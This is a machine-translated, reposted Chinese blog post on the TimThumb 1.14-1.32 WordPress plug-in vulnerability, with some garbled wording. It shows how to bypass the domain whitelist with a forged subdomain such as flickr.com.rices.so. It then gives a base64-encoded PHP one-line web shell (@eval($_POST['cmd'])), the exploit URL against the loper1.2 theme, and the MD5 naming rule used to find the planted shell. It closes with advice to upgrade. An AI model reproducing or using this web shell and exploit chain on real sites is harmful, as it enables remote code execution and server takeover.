Introduction and demonstration of Timthumb thumbnail plug-in Vulnerability

Www.2cto.com: it is not a new article, but it is not in the station. It is sent for your reference.

First, this hole has been in existence for a long time. It should have been in July, but there are not many people to fill. So the harm is still relatively large!
What the Timthumb plug-in does is not much about it. It is used to generate thumbnails. People who are theme should know it.
However, images generated using Timthumb are automatically stored in the specified cache directory. For example, the thumbnail files generated by Timthumb in the loper1.2 topic are stored in the cache folder in the topic directory.

Originally, the Timthumb plug-in is only allowed to process the current domain name, that is, if the file is submitted externally, it will not be processed. For example, I want to put 1 under the www.dd.com domain name. the php file is handed over to the Timthumb plug-in under the www.cc.com domain name for processing. It will display an error.

However, for the convenience of users, the author of Timthumb has a built-in whitelist for some well-known website domain names, such as the famous image sharing websites such as Flickr and Picasa. That is to say, using a website in the whitelist for submission also allows Timthumb to process the request. However, here, the Timthumb plug-in does not strictly filter white list domain names, so attackers can forge Level 3 domain names such as "flickr.com.dd.com" to bypass Timthumb filtering.
Timthumb does not determine the type of file submitted by default, so you can directly submit the PHP file, which is also known as Getshell!

The affected Timthumb version is 1.14-1.32. From the preceding error message, we can also find that Timthumb in LOPER1.2 is 1.19, so this vulnerability exists!
Therefore, for domestic wp circles, the biggest harm is to use the loper1.2 version of the topic, and the previous wooden grain topic of the shrimp.
Because I have never paid attention to this hole before, and I did not perform a simple test until I met it the day before yesterday. I found that it is not difficult to use it. Here I will cover up the specific usage methods, first, create a three-level domain name of flickr.com.site.com. rices. so is used for demonstration. As for how to create a DNS server, you can directly create dnspod and dnsever ~~

Then, you can find a space to bind the domain name, and upload a PHP file that requires getshell to the directory .. Here I will briefly mention
There is a big misunderstanding about the usage method mentioned on the Internet. It is said that the space for storing php files must not support php parsing, that is, to access the php file and directly pop up and download the space before it can be used successfully, in fact, you don't have to worry about it. Because Timthumb reads the code executed by php, we can simply echo one sentence. The Code is as follows:

PHP
Echo base64_decode ("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4 = ");
A sentence is output after execution. @eval($_POST['cmd']);

The following uses LOPER1.2's Timthumb as an example to access "wp-content/themes/loper1.2/timthumb. php" in a browser? Src = http://flickr.com.rices.so/1.php"

Although the message "Invalid src mime type" is prompted, We have downloaded one sentence of php to the cache folder.

Of course, in actual use, we cannot know the downloaded PHP user name, but it is very easy to get the user name. In fact, the file name is the MD5 value of the file address. For example, the file address here is http://flickr.com.rices.so/1.php,

I have already drawn a clear picture. I will not talk about it here, but the naming rules for Timthumb2.0 and later versions will be different, but this is not covered in this article, the affected versions are only 1.14-1.32!
Here we can also find that it is not difficult to use it, and the damage is also very great. Therefore, for the repair, please upgrade the version of loper1.3, it is best to download and overwrite 1.2 kids shoes.


From Rice's Blog